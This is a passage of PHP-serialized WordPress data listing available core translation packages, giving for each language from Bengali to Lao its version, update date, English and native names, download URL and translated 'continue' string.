12:57:10\";s:12:\"english_name\";s:7:\"Bengali\";s:11:\"native_name\";s:15:\"বাংলা\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/bn_BD.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"bn\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:23:\"এগিয়ে চল.\";}}s:2:\"bo\";a:8:{s:8:\"language\";s:2:\"bo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-05 09:44:12\";s:12:\"english_name\";s:7:\"Tibetan\";s:11:\"native_name\";s:21:\"བོད་ཡིག\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/bo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bo\";i:2;s:3:\"tib\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"མུ་མཐུད།\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-04 20:20:28\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-21 05:42:26\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:3:\"ceb\";a:8:{s:8:\"language\";s:3:\"ceb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-02 17:25:51\";s:12:\"english_name\";s:7:\"Cebuano\";s:11:\"native_name\";s:7:\"Cebuano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/ceb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"ceb\";i:3;s:3:\"ceb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Padayun\";}}s:5:\"cs_CZ\";a:8:{s:8:\"language\";s:5:\"cs_CZ\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-12 08:46:26\";s:12:\"english_name\";s:5:\"Czech\";s:11:\"native_name\";s:12:\"Čeština‎\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/cs_CZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cs\";i:2;s:3:\"ces\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Pokračovat\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-13 20:49:00\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-03 23:25:51\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsæt\";}}s:14:\"de_CH_informal\";a:8:{s:8:\"language\";s:14:\"de_CH_informal\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-09 11:53:31\";s:12:\"english_name\";s:30:\"German (Switzerland, Informal)\";s:11:\"native_name\";s:21:\"Deutsch (Schweiz, Du)\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/translation/core/4.8.3/de_CH_informal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_CH\";a:8:{s:8:\"language\";s:5:\"de_CH\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-09 11:51:58\";s:12:\"english_name\";s:20:\"German (Switzerland)\";s:11:\"native_name\";s:17:\"Deutsch (Schweiz)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/de_CH.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-05 15:55:17\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:12:\"de_DE_formal\";a:8:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-05 15:54:18\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/4.8.3/de_DE_formal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:3:\"dzo\";a:8:{s:8:\"language\";s:3:\"dzo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-06-29 08:59:03\";s:12:\"english_name\";s:8:\"Dzongkha\";s:11:\"native_name\";s:18:\"རྫོང་ཁ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/dzo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"dz\";i:2;s:3:\"dzo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:0:\"\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-17 21:52:40\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 04:53:41\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_ZA\";a:8:{s:8:\"language\";s:5:\"en_ZA\";s:7:\"version\";s:5:\"4.7.7\";s:7:\"updated\";s:19:\"2017-01-26 15:53:43\";s:12:\"english_name\";s:22:\"English (South Africa)\";s:11:\"native_name\";s:22:\"English (South Africa)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.7/en_ZA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_NZ\";a:8:{s:8:\"language\";s:5:\"en_NZ\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 08:21:28\";s:12:\"english_name\";s:21:\"English (New Zealand)\";s:11:\"native_name\";s:21:\"English (New Zealand)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/en_NZ.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 21:51:20\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 02:09:59\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-09 01:07:24\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-31 15:12:02\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_MX.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_VE\";a:8:{s:8:\"language\";s:5:\"es_VE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-30 16:09:17\";s:12:\"english_name\";s:19:\"Spanish (Venezuela)\";s:11:\"native_name\";s:21:\"Español de Venezuela\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_VE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CO\";a:8:{s:8:\"language\";s:5:\"es_CO\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-08-13 17:00:30\";s:12:\"english_name\";s:18:\"Spanish (Colombia)\";s:11:\"native_name\";s:20:\"Español de Colombia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_CO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 23:35:48\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_ES.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"es\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_GT\";a:8:{s:8:\"language\";s:5:\"es_GT\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 14:57:32\";s:12:\"english_name\";s:19:\"Spanish (Guatemala)\";s:11:\"native_name\";s:21:\"Español de Guatemala\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_GT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_AR\";a:8:{s:8:\"language\";s:5:\"es_AR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-16 03:17:36\";s:12:\"english_name\";s:19:\"Spanish (Argentina)\";s:11:\"native_name\";s:21:\"Español de Argentina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_AR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-09 09:36:22\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/es_PE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-28 20:09:49\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/es_CL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CR\";a:8:{s:8:\"language\";s:5:\"es_CR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-01 17:54:52\";s:12:\"english_name\";s:20:\"Spanish (Costa Rica)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_CR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"et\";a:8:{s:8:\"language\";s:2:\"et\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 16:37:11\";s:12:\"english_name\";s:8:\"Estonian\";s:11:\"native_name\";s:5:\"Eesti\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/et.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"et\";i:2;s:3:\"est\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Jätka\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-05 15:31:51\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:3:\"4.8\";s:7:\"updated\";s:19:\"2017-06-09 15:50:45\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.8/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-28 11:00:29\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-05 14:21:50\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_BE\";a:8:{s:8:\"language\";s:5:\"fr_BE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-28 09:14:18\";s:12:\"english_name\";s:16:\"French (Belgium)\";s:11:\"native_name\";s:21:\"Français de Belgique\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/fr_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_CA\";a:8:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-18 16:10:50\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/fr_CA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-08-23 17:41:37\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 16:43:49\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"gu\";a:8:{s:8:\"language\";s:2:\"gu\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-13 21:13:24\";s:12:\"english_name\";s:8:\"Gujarati\";s:11:\"native_name\";s:21:\"ગુજરાતી\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/gu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gu\";i:2;s:3:\"guj\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:31:\"ચાલુ રાખવું\";}}s:3:\"haz\";a:8:{s:8:\"language\";s:3:\"haz\";s:7:\"version\";s:5:\"4.4.2\";s:7:\"updated\";s:19:\"2015-12-05 00:59:09\";s:12:\"english_name\";s:8:\"Hazaragi\";s:11:\"native_name\";s:15:\"هزاره گی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.4.2/haz.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"haz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-13 06:33:35\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"המשך\";}}s:5:\"hi_IN\";a:8:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-28 10:29:26\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/hi_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hi\";i:2;s:3:\"hin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"जारी\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-07 15:11:19\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:48:39\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Folytatás\";}}s:2:\"hy\";a:8:{s:8:\"language\";s:2:\"hy\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-03 16:21:10\";s:12:\"english_name\";s:8:\"Armenian\";s:11:\"native_name\";s:14:\"Հայերեն\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/hy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hy\";i:2;s:3:\"hye\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Շարունակել\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-28 12:45:08\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"is_IS\";a:8:{s:8:\"language\";s:5:\"is_IS\";s:7:\"version\";s:5:\"4.7.7\";s:7:\"updated\";s:19:\"2017-04-13 13:55:54\";s:12:\"english_name\";s:9:\"Icelandic\";s:11:\"native_name\";s:9:\"Íslenska\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.7/is_IS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"is\";i:2;s:3:\"isl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Áfram\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-07 11:16:13\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-09 07:51:37\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"続ける\";}}s:5:\"jv_ID\";a:8:{s:8:\"language\";s:5:\"jv_ID\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-10 10:29:02\";s:12:\"english_name\";s:8:\"Javanese\";s:11:\"native_name\";s:9:\"Basa Jawa\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/jv_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"jv\";i:2;s:3:\"jav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Nerusaké\";}}s:5:\"ka_GE\";a:8:{s:8:\"language\";s:5:\"ka_GE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-09 06:06:41\";s:12:\"english_name\";s:8:\"Georgian\";s:11:\"native_name\";s:21:\"ქართული\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ka_GE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ka\";i:2;s:3:\"kat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"გაგრძელება\";}}s:3:\"kab\";a:8:{s:8:\"language\";s:3:\"kab\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-08-22 15:33:00\";s:12:\"english_name\";s:6:\"Kabyle\";s:11:\"native_name\";s:9:\"Taqbaylit\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.8.3/kab.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"kab\";i:3;s:3:\"kab\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Kemmel\";}}s:2:\"km\";a:8:{s:8:\"language\";s:2:\"km\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-07 02:07:59\";s:12:\"english_name\";s:5:\"Khmer\";s:11:\"native_name\";s:27:\"ភាសាខ្មែរ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/km.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"km\";i:2;s:3:\"khm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"បន្ត\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-10 13:54:32\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:3:\"ckb\";a:8:{s:8:\"language\";s:3:\"ckb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:48:25\";s:12:\"english_name\";s:16:\"Kurdish (Sorani)\";s:11:\"native_name\";s:13:\"كوردی‎\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/ckb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ku\";i:3;s:3:\"ckb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"به‌رده‌وام به‌\";}}s:2:\"lo\";a:8:{s:8:\"language\";s:2:\"lo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 